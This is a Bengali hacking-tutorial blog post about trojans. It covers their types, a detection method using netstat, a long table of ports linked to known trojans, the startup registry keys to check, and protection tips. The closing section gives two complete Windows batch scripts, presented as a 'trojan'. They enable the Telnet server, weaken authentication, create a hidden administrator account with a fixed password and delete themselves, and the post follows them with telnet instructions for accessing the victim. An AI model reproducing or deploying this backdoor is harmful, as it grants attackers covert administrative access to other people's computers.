ব্যাসিক হ্যাকিং পর্ব ৩: ট্রোজান কি ? কেন ? কিভাবে ?

কেমন আছেন সবাই ? আশা করি ভালো আছেন :D অনেকদিন পর লিখতে বসলাম । হুট করে কিছু ব্যাক্তিগত ব্যস্ততার কারনে এ  কদিন সময় দিতে পারি নাই । যাইহোক আবার চলে এসেছি । ইনশাআল্লাহ এখন থেকে আবার নিয়মিত লিখতে পারব :) আজ আমি লিখব ব্যাসিক  হ্যাকিং এর ৩য় পর্ব । আজ আপনাদের কে ট্রোজান  সম্পর্কে নুন্যতম প্রয়োজনীয় তথ্য গুলো জানাতে চেষ্টা করব :)

শুরুতেই আসুন জেনে নেই ট্রোজান কি ?

 

ট্রোজান সম্পর্কে উইকিপিডিয়া বলে

A Trojan horse, or Trojan, is a standalone malicious program that does not attempt to infect other computers in a completely automatic manner without help from outside forces like other programs and human intervention.

অর্থাৎ স্ব নির্ভর যে সব ক্ষতিকারক প্রোগ্রাম বাইরের কোন সাহায্য ছাড়া যেমন অন্যান্য প্রোগ্রাম এবং মানুষের হস্তক্ষেপ ছাড়া স্বয়ংক্রিয় ভাবে অন্য কম্পিউটার বা সিস্টেম কে আক্রান্ত করার চেষ্টা করে না তাদের কে ট্রোজান বা ট্রোজান হর্স বলে ।

সহজ ভাষা তে  একটি  বাস্তব ও বিশ্বাসযোগ্য [  trusted ]  প্রোগ্রাম এর ভেতর লুকিয়ে থাকা অনাকাঙ্ক্ষিত ও ক্ষতিকারক প্রোগ্রাম ট্রোজান । যেহেতু এটা অনাকাঙ্ক্ষিত , তাই এর গতিবিধি , কার্যপ্রণালী , কার্যপদ্ধতি , ব্যাপ্তি সবকিছুই ইউজার এর  নিকট অজানা থেকে যায় । কথা প্রসঙ্গে বলে রাখি অপারেটিং সিস্টেম এর  registry অন্তর্ভুক্ত না থাকা সব প্রোগ্রাম ই অনাকাঙ্ক্ষিত বলে সিস্টেম এর কাছে গণ্য হবে ।

 

ট্রোজান এর কার্যবিধি :

গ্রীক মিথ অনুযায়ী গ্রীক রা তাদের সৈন্য বাহিনী কে কতগুলো কাঠের তৈরি ঘোড়ার ভেতর ভরে সেই ঘোড়াগুলোকে ট্রয় বাসীদের উপহার দেয়। পরে যুদ্ধ শুরু হলে ওই সৈন্য গুলো ঘোড়া থেকে বের হয়ে  ট্রয় এর অভেদ্য দেয়াল এর ভেতর থেকে আক্রমন করে ট্রয় দখল করে নেয় ।  অখান থেকেই মুলত এধরনের প্রোগ্রাম কে ট্রোজান নাম দেওা হয় । একে  হ্যাকার রা ভালবেসে Mr. James  ও বলে থাকে এর গুপ্তচর বৃত্তীয় কাজে দক্ষতার জন্য !

ট্রোজান এর সৃষ্টিকর্তা বা ডিজাইনার এর ইচ্ছা অনুযায়ী ট্রোজান করতে পারে না এমন কোন কাজ নেই ! ! এটা ফাইল কপি , ডিলিট , পেস্ট , adware , malware , spyware প্রোগ্রাম ইন্সটল করা , ইন্টারনেট অ্যাক্সেস , প্রোগ্রাম রিমুভ সব ই করতে পারে ।

 

ট্রোজান এর ধরণ :

☻Remote Access Trojans:  এগুলো  ভিকটিম এর সিস্টেম এর আংশিক বা পুরপুরি দখল নিয়ে নিতে পারে ।  একটা সার্ভার অ্যাপ্লিকেশান এর মাধ্যমে  ভিকটিম এর পিসি হতে সব ধরনের আনুচরন করা হয় হ্যাকার এর পিসি থেকে । সিস্টেম স্টার্ট করার সাথে সাথে এটা এর  ক্লায়েন্ট সিস্টেম [ হ্যাকার এর সিস্টেম ] এর সাথে একটা নির্দিষ্ট পোর্ট এর মাধ্যমে নিরাপদ সংযোগ স্থাপন করে । এর পর ক্লায়েন্ট সিস্টেম থেকে যা ইচ্ছা করা যায়  ভিকটিম এর সিস্টেম এ । বেশীর ভাগ ট্রোজান এ ধরনের। 

☻Data Sending Trojans:  একটা ইমেইল বা ব্যাকডোর এর মাধ্যমে   ভিকটিম এর সিস্টেম হতে কী – লগ , পাসওয়ার্ড , কুকি  ক্লায়েন্ট সিস্টেম এ ফিড করে ।

☻Destructive Trojans : দুটো   উদ্দেশ্য এ ধরনের ট্রোজান ব্যবহার করা হয়ে থাকে । (এক) ধ্বংসাত্মক উদ্দেশ্য – সিস্টেম ক্র্যাশ , অপারেটিং সিস্টেম কে করাপ্ট করা বা উরাধুরা র‍্যানডম ফাইল ডিলিট করা । ( দুই ) সিরিয়াস   উদ্দেশ্য – আপনার পিসি আর হ্যাকার এর ভেতর সব থেকে বড় বাধা হচ্ছে আপনার সিস্টেম এর ফায়ারওয়াল বা অ্যান্টিভাইরাস । আপনার পিসি কে নিজের বাগান এর মত বানিয়ে নিতে হ্যাকার রা এ ধরনের ট্রোজান বানায় । এটা এমন ভাবে প্রোগ্রাম করা হয় যে এ আপনার সিস্টেম এ এশে বসতি গাড়বে আপনারই সাধের ফায়ার ওয়াল বা অ্যান্টিভাইরাস এর উপর এগুলোর  সিক্যুরিটি কে আংশিক বা পুরপুরি ডিসঅ্যাবেল করে । হয়ত আপনার কাছে সবকিছুই আপাত ও ঠিকঠাক লাগবে কিন্তু কিছুই ঠিক নেই :( 

☻DDos Attack Trojans: একটা সার্ভার এর সাথে সংযুক্ত সন গুলো সিস্টেম [ ল্যান নেটওয়ার্ক ] বা সিস্টেম কে ধসিয়ে দেবার জন্য এর কোন তুলনা ও নেই , উত্তর ও নেই , প্রতিরধ ও নেই । এরা অপরাজেয় ! এটা  প্রথমে সার্ভার  এর ও এর সাথে সংযুক্ত সবগুলো সিস্টেম গুলো কে আক্রমন করে আক্রান্ত বা ইনফ্যাক্টেড করে  ফেলে এবং এগুলো কে স্ট্যান্ডবাই করে রাখে । এর পর  হঠাৎ করে সবগুলো সিস্টেম এ এবং সিস্টেম গুলো থেকে সার্ভার এ একসাথে অগুনতি সিস্টেম কমান্ড দিতে থাকে । সিস্টেম এর কার্যকরী ক্ষমতার বাইরে যখনই কমান্ড এর সংখ্যা চলে যাবে তখন এ সার্ভার ও এর সাথে সংযুক্ত সবগুলো সিস্টেম একসাথে  ক্র্যাশ করবে এবং অকারজকরি হয়ে  যাবে ।

☻Proxy Trojans :  হ্যাকার দের পরিচয় গোপন করাই এটার  উদ্দেশ্য। মনে করুন আপনার সিস্টেম কে আমি আক্রমন করব । সে জন্য আপনার পিসি এর পরিচয় আমাকে পেতে হবে । আমি আমার  কম্যান্ড প্রম্পট থেকে সহজেই টা পেতে পারি । কিন্তু সে জন্য আমাকে আমার নিজের পরিচয় ও দিতে হবে । এখানে পরিচ্য শব্দ টা ব্যাবহার করা হচ্ছে পোর্ট  আইডেনটিটি , আই পি , ম্যাক সব এ অন্তর্ভুক্ত । শুধু এটা লুকানর জন্যই এধরেন ট্রোজান ব্যাবহার করা হয় । এটা দ্বারা আমি অন্য একটা স্লেভ সিস্টেম ব্যাবহার করে আপনার পরিচয় নিতে পারব এবং সেক্ষেত্রে আপনি ব্যাক ট্র্যাক করলেও স্লেভ সিস্টেম এর পরিচয় পাবেন , আমার টা না !

☻Security Software Disabler Trojan : এটার নামেই পরিচয় । সিস্টেম কে আক্রমন করে এদের কাজ হচ্ছে সিস্টেম এর ডিফল্ট না এমন সব সিক্যুরিটি অ্যাপ্লিকেশান এবং সফটওয়্যার গুলো কে ডিজঅ্যাবেল করে পরবর্তী আক্রমনের জন্য আদর্শ পরিবেশ তৈরি করে দেওয়া । এদের কে রেকি ট্রোজান ও বলে থাকে ।

 

 

কিভাবে বুঝবেন আপনি আক্রান্ত কিনা [ সনাক্তিকরন ] 

 

ট্রোজান এর সবথেকে বড় সনাক্তিকরন পদ্ধতি হচ্ছে এটা যে কোন অবস্থা তেই নেটওয়ার্ক  অ্যাডাপটার এর সাথে একটা  নির্দিষ্ট পোর্ট এর মাধ্যমে লিসেনার পোস্ট বা হ্যাকার এর সিস্টেম এ ডাটা ফিড করে । হালনাগাদ অ্যান্টিভাইরাস অথবা অ্যান্টি স্পাই ও্যায়ার ,অ্যান্টি ম্যাল ও্যায়ার  এগুলো থাকলে খুব সহজেই আপনি জানতে পারবেন আপনি ট্রোজান আক্রান্ত কিনা । শুধু তাই না আপনি সেগুল রিমুভ ও করতে পারবেন । তবে এগুলো ছাড়া ও আপনি বুঝতে পারবেন আপনি আক্রান্ত কিনা । তবে ব্যক্তিগত ভাবে আমি বলব আপনারা নিজে নিজেই ট্রোজান টি খুজে বের করার চেষ্টা করুন । কারন অনেক সময় ই ট্রোজান গুলো FUD / Fully Un-Detectable  হয় । অর্থাৎ খুব হালনাগাদ অ্যান্টিভাইরাস ও এর অস্তিত্ব সম্পর্কে কিছুই বলতে পারে না ! নিজে কিভাবে খুজে বের করবেন তার পদ্ধতি আমি আপনাদের কে এখন বলব :)

১) প্রথমেই  RUN  থেকে  কমান্ড প্রম্পট বা  CMD  ওপেন করুন নিচের চিত্রের মত করে

 

 

২) কমান্ড প্রম্পট ওপেন হলে netstat -a লিখে এন্টার দিন ।এতে করে আপনার সিস্টেম এর সচল সবগুলো পোর্ট কানেকশন , লোকাল , ফরেন অ্যাড্রেস ও এর অবস্থা  সম্পর্কিত একটা তালিকা প্রদর্শন করবে CMD ।

৩) একটু অপেক্ষা করুন ।এবার netstat -a লিখে কমান্ড দিন এমং এন্টার চাপুন এবার আপনার সিস্টেম এর সবগুলো পোর্ট কে প্রদর্শন করাবে CMD  নিচের চিত্রের মত করে

 

৪) Local Address  এর নিচে যত গুলো এন্ট্রি দেখতে পাবেন তার সবগুলোর শেষে  ‘:’  এই চিহ্নের পর যে সংখ্যা থাকবে ওটাই হচ্ছে ওই  কানেকশন এর লোকাল পোর্ট ।  চিত্রের নিচে লক্ষ্য করুন একটা লিস্ট দেওয়া আছে । যেখানে পরিচিত সব ট্রোজান গুলো কোন কোন পোর্ট ব্যবহার করে তার পূর্ণ তালিকা করা হয়েছে । ওখান থেকে আপনার CMD  থেকে প্রাপ্ত লিস্ট এর সাথে মিলিয়ে দেখুন । যদি দেখেন কোন পোর্ট মিলে গেছে তাহলে  নিচের চিত্রের মত করে আবার কমান্ড প্রম্পট এ লিখুন  netstat -aon এবং এন্টার চাপুন

পোর্ট	ট্রোজান এর নাম
1 (UDP)	Sockets des Troie
2	Death
20	Senna Spy FTP server
21	Back Construction, Blade Runner, Cattivik FTP Server, CC Invader, Dark FTP, Doly Trojan, Fore, Invisible FTP, Juggernaut 42, Larva, MotIv FTP, Net Administrator, Ramen, Senna Spy FTP server, The Flu, Traitor 21, WebEx, WinCrash
22	Shaft
23	Fire HacKer, Tiny Telnet Server – TTS, Truva Atl
25	Ajan, Antigen, Barok, Email Password Sender – EPS, EPS II, Gip, Gris, Happy99, Hpteam mail, Hybris, I love you, Kuang2, Magic Horse, MBT (Mail Bombing Trojan), Moscow Email trojan, Naebi, NewApt worm, ProMail trojan, Shtirlitz, Stealth, Tapiras, Terminator, WinPC, WinSpy
30	Agent 40421
31	Agent 31, Hackers Paradise, Masters Paradise
41	Deep Throat, Foreplay
48	DRAT
50	DRAT
58	DMSetup
59	DMSetup
79	CDK, Firehotcker
80	711 trojan (Seven Eleven), AckCmd, Back End, Back Orifice 2000 Plug-Ins, Cafeini, CGI Backdoor, Executor, God Message, God Message Creator, Hooker, IISworm, MTX, NCX, Reverse WWW Tunnel Backdoor, RingZero, Seeker, WAN Remote, Web Server CT, WebDownloader
81	RemoConChubo
99	Hidden Port, NCX
110	ProMail trojan
113	Invisible Identd Deamon, Kazimas
119	Happy99
121	Attack Bot, God Message, JammerKillah
123	Net Controller
133	Farnaz
137	Chode
137 (UDP)	Msinit
138	Chode
139	Chode, God Message worm, Msinit, Netlog, Network, Qaz
142	NetTaxi
146	Infector
146 (UDP)	Infector
170	A-trojan
334	Backage
411	Backage
420	Breach, Incognito
451	TCP Wrappers trojan
455	Fatal Connections
456	Hackers Paradise
513	Hackers Paradise
555	RPC Backdoor
605	Net666, Rasmin
666	711 trojan (Seven Eleven), Ini-Killer, Net Administrator, Phase Zero, Phase-0, Stealth Spy
667	Secret Service
669	Attack FTP, Back Construction, BLA trojan, Cain & Abel, NokNok, Satans Back Door – SBD, ServU, Shadow Phyre, th3r1pp3rz (= Therippers)
692	SniperNet
777	DP trojan
808	GayOL
911	AimSpy, Undetected
999	WinHole
1000	Dark Shadow
1001	Deep Throat, Foreplay, WinSatan
1010	Der Späher / Der Spaeher, Direct Connection
1011	Der Späher / Der Spaeher, Le Guardien, Silencer, WebEx
1012	Doly Trojan
1015	Doly Trojan
1016	Doly Trojan
1020	Doly Trojan
1024	Doly Trojan
1025	Vampire
1025 (UDP)	Jade, Latinus, NetSpy
1035	Remote Storm
1042	Remote Storm
1045	Multidropper
1049	BLA trojan
1050	Rasmin
1053	/sbin/initd
1054	MiniCommand
1080	The Thief
1081	AckCmd
1082	WinHole
1083	WinHole
1090	WinHole
1095	WinHole
1097	Xtreme
1098	Remote Administration Tool – RAT
1099	Remote Administration Tool – RAT
1150	Remote Administration Tool – RAT
1151	Blood Fest Evolution, Remote Administration Tool – RAT
1170	Orion
1200 (UDP)	Orion
1201 (UDP)	Psyber Stream Server – PSS, Streaming Audio Server, Voice
1207	NoBackO
1208	NoBackO
1212	SoftWAR
1234	Infector
1243	Kaos
1245	SubSeven Java client, Ultors Trojan
1255	BackDoor-G, SubSeven, SubSeven Apocalypse, Tiles
1256	VooDoo Doll
1269	Scarab
1272	Project nEXT
1313	Matrix
1338	The Matrix
1349	The Matrix
1394	Millenium Worm
1441	Bo dll
1492	GoFriller, Backdoor G-1
1524	Remote Storm
1568	FTP99CMP
1600	Trinoo
1703	Remote Hack
1777	Direct Connection, Shivka-Burka
1807	Exploiter
1966	Scarab
1967	SpySender
1969	Fake FTP
1981	WM FTP Server
1999	OpC BO
2000	টBowl,Shockrave
2001	Back Door, SubSeven, TransScout
2023	Der Späher / Der Spaeher, Insane Network, Last 2000, Remote Explorer 2000, Senna Spy Trojan Generator
2080	Der Späher / Der Spaeher, Trojan Cow
2115	Ripper Pro
2130(UDP)	WinHole
2140	Bugs
2140(UDP)	Mini Backlash
2155	The Invasor
2255	Deep Throat,Foreplay
2283	Illusion Mailer
2300	Nirvana
2311	Hvl RAT
2330	Xplorer
2331	Studio 54
2332	Contact
2333	Contact
2334	Contact
2335	Contact
2336	Contact
2337	Contact
2338	Contact
2339	Contact, Voice Spy
2339(UDP)	Contact
2345	Contact, Voice Spy
2565	Voice Spy
2583	Doly Trojan
2600	Striker trojan
2716	WinCrash
2773	Digital RootBeer
2774	The Prayer
2801	SubSeven, SubSeven 2.1 Gold
2989(UDP)	SubSeven, SubSeven 2.1 Gold
3000	Phineas Phucker
3024	Phineas Phucker
3031	Remote Shut
3128	WinCrash
3129	Microspy
3150	Reverse WWW Tunnel Backdoor, RingZero
3150(UDP)	Masters Paradise
3456	The Invasor
3459	Deep Throat,Foreplay,Mini Backlash
3700	Terror trojan
3777	Eclipse 2000,Sanctuary
3791	Portal of Doom
3801	PsychWard
4000	Total Solar Eclypse
4092	Total Solar Eclypse
4242	SkyDance
4321	WinCrash
4444	Virtual Hacking Machine -VHM
4567	BoBo
4590	Prosiak, Swift Remote
4950	File Nail
5000	ICQ Trojan
5001	ICQ Trogen (Lm)
5002	Back Door Setup, Blazer5, Bubbel, ICKiller, Ra1d, Sockets des Troie
5010	Back Door Setup, Sockets des Troie
5011	cd00r, Shaft
5025	Solo
5031	One of the Last Trojans – OOTLT, One of the Last Trojans – OOTLT, modified
5032	WM Remote KeyLogger
5321	Net Metropolitan
5333	Net Metropolitan
5343	Firehotcker
5400	Backage, NetDemon
5401	wCrat – WC Remote Administration Tool
5402	Back Construction, Blade Runner
5512	Back Construction, Blade Runner
5534	Back Construction, Blade Runner
5550	Illusion Mailer
5555	Xtcp
5556	ServeMe
5557	BO Facil
5569	BO Facil
5637	Robo – Hack
5638	PC Crasher
5742	PC Crasher
5760	WinCrash
5880	Portmap Remote Root Linux Exploit
5882	Y3K RAT
5882	Y3K RAT
5882 (UDP)	Y3K RAT
5888	Y3K RAT
5889	Y3K RAT
5889	Y3K RAT
6000	The Thing
6000	Bad Blood
6000	Secret Service
6000	The Thing
6661	TEMan, Weia-Meia
6666	Dark Connection Inside, NetBus worm
6667	Dark FTP, ScheduleAgent, SubSeven, Subseven 2.1.4 DefCon 8, Trinity, WinSatan
6669	Host Control, Vampire
6670	BackWeb Server, Deep Throat, Foreplay, WinNuke eXtreame
6711	BackDoor-G, SubSeven, VP Killer
6710	Funny trojan, SubSeven
6713	SubSeven
6723	Mstream
6771	Deep Throat, Foreplay
6776	2000 Cracks, BackDoor-G, SubSeven, VP Killer
6838 (UDP)	Mstream
6883	Delta Source DarkStar (??)
6912	Shit Heep
6939	Indoctrination
6969	GateCrasher, IRC 3, Net Controller, Priority
6970	GateCrasher
7000	Exploit Translation Server, Kazimas, Remote Grab, SubSeven, SubSeven 2.1 Gold
7001	Freak88, Freak2k
7215	SubSeven, SubSeven 2.1 Gold
7300	NetMonitor
7301	NetMonitor
7306	NetMonitor
7307	NetMonitor
7308	NetMonitor
7424	Host Control
7424 (UDP)	Host Control
7597	Qaz
7626	Glacier
7777	God Message, Tini
7789	Back Door Setup, ICKiller
7891	The ReVeNgEr
7983	Mstream
8080	Brown Orifice, RemoConChubo, Reverse WWW Tunnel Backdoor, RingZero
8787	Back Orifice 2000
8988	BacHack
8989	Rcon, Recon, Xcon
9000	Netministrator
9325 (UDP)	Mstream
9400	InCommand
9872	Portal of Doom
9873	Portal of Doom
9874	Portal of Doom
9875	Portal of Doom
9876	Cyber Attacker, Rux
9878	TransScout
9989	Ini-Killer
9999	The Prayer
10000	OpwinTRojan
10005	OpwinTRojan
10067 (UDP)	OpwinTRojan
10085	Syphillis
10086	Syphillis
10100	Control Total, Gift trojan
10101	BrainSpy, Silencer
10167 (UDP)	Portal of Doom
10520	Acid Shivers
10528	Host Control
10607	Coma
10666 (UDP)	Ambush
11000	Senna Spy Trojan Generator
11050	Host Control
11051	Host Control
11223	Progenic trojan, Secret Agent
12076	Gjamer
12345	Hack´99 KeyLogger
12346	Ashley, cron / crontab, Fat Bitch trojan, GabanBus, icmp_client.c, icmp_pipe.c, Mypic, NetBus, NetBus Toy, NetBus worm, Pie Bill Gates, Whack Job, X-bill
12349	Fat Bitch trojan, GabanBus, NetBus, X-bill
12361	BioNet
12362	Whack-a-mole
12363	Whack-a-mole
12623 (UDP)	Whack-a-mole
12624	DUN Control
12631	ButtMan
12754	Whack Job
13000	Mstream
13010	Senna Spy Trojan Generator, Senna Spy Trojan Generator
13013	Hacker Brasil – HBR
13014	PsychWard
13223	PsychWard
13473	Hack´99 KeyLogger
14500	Chupacabra
14501	PC Invader
14502	PC Invader
14503	PC Invader
15000	PC Invader
15092	NetDemon
15104	Host Control
15382	Mstream
15858	SubZero
16484	CDK
16660	Mosucker
16772	Sracheldraht
16959	ICQ Revenge
16969	SubSeven, Subseven 2.1.4 DefCon 8
17166	Priority
17300	Mosaic
17449	Kuang2 the virus
17500	Kid Terror
17569	CrazzyNet
17593	CrazzyNet
17777	Infector
18753 (UDP)	Audiodoor
19864	Nephron
20000	ICQ Revenge
20001	Millenium
20002	Millenium, Millenium (Lm)
20005	AcidkoR
20023	Mosucker
20034	NetBus 2.0 Pro, NetBus 2.0 Pro Hidden, NetRex, Whack Job
20203	Chupacabra
20331	BLA trojan
20432	Shaft
20433 (UDP)	Shaft
21544	GirlFriend, Kid Terror
21554	Exploiter, Kid Terror, Schwindler, Winsp00fer
22222	Donald Dick, Prosiak, Ruler, RUX The TIc.K
23005	NetTrash
23006	NetTrash
23023	Logged
23030	Amanda
23432	Asylum
23456	Evil FTP, Ugly FTP, Whack Job
23476	Donald Dick
23476 (UDP)	Donald Dick
23477	Donald Dick
23777	InetSpy
24000	Infector
25685	Moonpie
25686	Moonpie
25982	Moonpie
26274 (UDP)	Delta Source
26681	Voice Spy
27374	Bad Blood, Ramen, Seeker, SubSeven, SubSeven 2.1 Gold, Subseven 2.1.4 DefCon 8, SubSeven Muie, Ttfloader
27444 (UDP)	Trinoo
27573	SubSeven
27665	Trinoo
28678	Exploiter
29104	NetTrojan
29363	ovasOn
29891	The Unexplained
30000	Infector
30001	ErrOr32
30003	Lamers Death
30029	AOL trojan
30100	NetSphere
30101	NetSphere
30102	NetSphere
30103	NetSphere
30103 (UDP)	NetSphere
30133	NetSphere
30303	Sockets des Troie
30947	Intruse
30999	Trinoo
31335	Bo Whack, Butt Funnel
31336	Back Fire, Back Orifice 1.20 patches, Back Orifice (Lm), Back Orifice russian, Baron Night, Beeone, BO client, BO Facil, BO spy, BO2, cron / crontab, Freak88, Freak2k, icmp_pipe.c, Sockdmini
31337	Back Orifice, Deep BO
31337 (UDP)	Back Orifice, Butt Funnel, NetSpy (DK)
31338	BOWhack
31338 (UDP)	Hack´a´Tack
31787	Hack´a´Tack
31788	Hack´a´Tack
31789 (UDP)	Hack´a´Tack
31790	Hack´a´Tack
31791 (UDP)	Hack´a´Tack
31792	Hack´a´Tack
32001	Donald Dick
32100	Peanut Brittle, Project nEXT
32418	Acid Battery
33270	Trinity
33333	Blakharaz, Prosiak
33577	Son of PsychWard
33777	Son of PsychWard
33911	Spirit 2000, Spirit 2001
34324	Big Gluck, TN
34444	Donald Dick
34555 (UDP)	Trinoo (for Windows)
35555 (UDP)	Trinoo (for Windows)
37237	Mantis
37651	Yet Another Trojan – YAT
40412	The Spy
40421	Agent 40421, Masters Paradise
40422	Masters Paradise
40423	Masters Paradise
40425	Masters Paradise
40426	Masters Paradise
41337	Storm
41666	Remote Boot Tool – RBT, Remote Boot Tool – RBT
44444	Prosiak
44575	Exploiter
47262 (UDP)	Delta Source
49301	OnLine KeyLogger
50130	Enterprise
50505	Sockes des Troie
50766	Fore, Schwindler
51966	Cafeini
52317	Acid Battery
53001	Remote Windows Shutdown – RWS
54283	SubSeven, SubSeven 2.1 Gold
54320	Back Orifice 2000
54321	Back Orifice 2000, School Bus
55165	File Manager trojan, File Manager trojan, WM Trojan Generator
55166	WM Trojan Generator
57341	NetRaider
58339	Butt Funnel
60000	Deep Throat, Foreplay, Sockets des Troie
60001	Trinity
60068	Xzip 6000068
60411	Connection
61348	Bunker – Hill
61466	TeleCommando
61603	Bunker – Hill
63485	Bunker – Hill
64101	Taskman
65000	Devil, Sockets des Troie, Stacheldraht
65390	Eclypse
65421	Jade
65432	The Traitor (= th3tr41t0r)
65432 (UDP)	The Traitor (= th3tr41t0r)
65534	/sbin/initd
65535	RC1 trojan

 

৪) এবার উপরের প্রথম ছবি তে লক্ষ্য করুন একেবারে ডান পাশে PID  আছে ।   এটা হচ্ছে Process ID । যে পোর্ট টা মিলে গেছে সেটার পোর্ট নাম্বার এর PID  খুজে বের করুন । এবার Windows Task Manager  বের করুন এবং Services  ট্যাব টি তে ক্লিক করুন নিচের চিত্রের মত  । মাঝের সারিতে  দেওয়া  PID  এর সাথে মিলিয়ে দেখুন প্রসেস নাম ও এর বর্ণনা [ description ]। নাম টা উপরে দেওয়া তালিকার সাথে মিলে যায় যদি তাহলে নিশ্চিত থাকুন আপনি ট্রোজান আক্রান্ত :(

 

 

উপরের পদ্ধতি ছাড়াও আপনি রেজিস্ট্রি এর মাধ্যমে বের করতে পারেন ট্রোজান আক্রান্ত কিনা আপনি । সব ট্রোজান ই auto – startup  এর আদলে নির্মিত । অর্থাৎ উইন্ডোজ ওপেন হলে এরাও ওপেন হয়ে যায় । তাই আপনি রেজিস্ট্রি থেকে খুব সহজেই দেখতে পারেন কোন কোন প্রোগ্রাম গুলো স্টার্ট আপ এর সাথে রান করে । যদি রেজিস্ট্রি তে যেতে চান তাহলে কমান্ড প্রম্পট থেকে Regedit লিখে এন্টার চাপুন ।   আমি নিচে সবগুলো অটো রান এর ডিরেক্টরি দিয়ে দিচ্ছি । আপনি যদি এভাবে খুজে বের করতে চান ট্রোজান এর অস্তিত্ব, তাহলে প্রত্যেকটি ডিরেক্টরি তে যেয়ে দেখুন Trojan.exe বা trojan.exe নামের কোন প্রোগ্রাম আছে কিনা । থাকলে নিশ্ছিত থাকুন আপনি ট্রোজান আক্রান্ত ।

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce]

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices]

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce]

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce]

 

 

ট্রোজান থেকে বাঁচার উপায়  :

১)ভালো মানের হালনাগাদ অ্যান্টিভাইরাস
২)অ্যান্টি স্পাইওয়্যার
৩)অ্যান্টি ফিশিং ওয়্যার
৪) রেজিট্রি ক্লিনার
৫) অ্যাড ব্লকার
৬) স্প্যাম রিমুভার

কিভাবে ট্রোজান বানাবেন ? :P :P :P

আমি খুব সহজ একটা ট্রোজান বানানো শিখিয়ে দিচ্ছি । এর জন্য দরকার শুধু এটা নোটপ্যাড ।

উইন্ডোজ এক্সপি এর জন্য ট্রোজান বানাতে হলে notepad ওপেন করুন এবং তাতে নিচের কোড টা কপি পেস্ট করুন এবং যেকোনো নাম দিয়ে .bat এক্সটেন্সান হিসেবে সেভ করুন ।

@echo off
sc config tlntsvr start=auto
sc start tlntsvr
tlntadmn config sec=-NTLM
tlntadmn config mode=stream
net user tunerpage/add
net user tunerpage 12345
net localgroup administrators tunerpage /add
reg /add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList /v tunerpage /t REG_DWORD /d 00
del trojan.bat

এখানে খেয়াল করুন উপরের কোড এ
১ম লাইন টা কমান্ড থেকে ইকো বন্ধ করে দিবে।
২য় লাইন টা প্রতিবার স্টার্টআপ এর সাথে সাথে সিস্টেম কে বলবে Telnet server কে স্টার্ট করতে।
৩য় লাইন টা সিস্টেম কে current windows NT systems এর জন্য Telnet server কে স্টার্ট করতে বলবে ।
৪র্থ লাইন টা পাসওয়ার্ড ফাইল এর NTLM hash security কে বন্ধ করে দিবে ।
৫ম লাইন টা Telnet server এর জন্য stream mode চালু করবে ও সংযোগ স্থাপন করবে ।
৬ষ্ঠ ও ৭ম লাইন দুটো tunerpage নামের একজন ইউজার তৈরি করবে যার পাসওয়ার্ড 12345 ।
৮ম লাইন টি tunerpage নামের ইউজারটিকে Administrator বানিয়ে দিবে ।
৯ম লাইন টি tunerpage নামের একজন ইউজার এর সব ডাটা লুকিয়ে রাখবে ।
১০ম লাইন টি পুরো ব্যাট ফাইল টিকে মুছে ফেলবে ।

উইন্ডোজ ৭ এং ভিস্তার জন্য ট্রোজান বানাতে হলে নিচের কোড টা কপি করে নোটপ্যাড এ পেস্ট করুন এবং যেকোনো নাম দিয়ে .bat এক্সটেন্সান হিসেবে সেভ করুন ।

@echo off
pkgmgr /iu:“TelnetClient”
pkgmgr /iu:“TelnetServer”
sc config tlntsvr start=auto
sc start tlntsvr
tlntadmn config sec=-NTLM
tlntadmn config mode=stream
net user tunerpage /add
net user tunerpage 12345
net localgroup administrators tunerpage /add
reg /add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList /v tunerpage /t REG_DWORD /d 00

একবার ইন্সটল হয়ে গেলে বা ট্রোজান টি স্লেভ কম্পিউটার এ নিজেকে স্থাপন করে ফেললে Telnet Client আছে এমন যেকোনো সার্ভার থেকে নিচের কোড এর  মাধ্যমে স্লেভ কম্পিউটার এ অ্যাক্সেস করতে পারবেন । শুধু  slave’s IP address এর জায়গা তে  স্লেভ এর আসল আই পি দিলেই কাজ হবে :D

C:\>telnet<slave’s IP address>

বিশেষ দ্রষ্টব্য : উপরের কোডিং টা খুব ই নিম্ন মানের এবং আদিম কালের ট্রোজান । এটা যেকোনো অ্যান্টিভাইরাস এর কাছে ধরা খাবে :P তারপর ও বলি , এই  কোডিং দেওয়ার উদ্দেশ্য শুধুই শেখার জন্য । আপনি যদি কারো ক্ষতি করার উদ্দেশে এটা ব্যবহার করতে চান তাহলে দয়া করে নিজ  দায়িত্বে করবেন । আমাকে বা টিউনার পেজ কে কোনভাবেই দায়ী  করা যাবে না :) 

 

মোটামুটি এই ছিল ট্রোজান নিয়ে বিস্তারিত আলোচনা । আশা করি আপনারা নতুন কিছু শিখতে পেরেছেন । যদি টা হয় অথবা যদি আপনাদের ভালো লেগে থাকে দয়া করে কমেন্ট করে জানাবেন । আর আপনাদের ও যদি কিছু জানতে ইচ্ছা হয়  কমেন্ট এ বলবেন । ইনশাআল্লাহ আমি টিউন করার চেষ্টা করব । আগামী টিউন এর জন্য অপেক্ষায় থাকুন । সে পর্যন্ত সবাই সুস্থ থাকুন , ভালো থাকুন । আল্লাহ হাফেয :)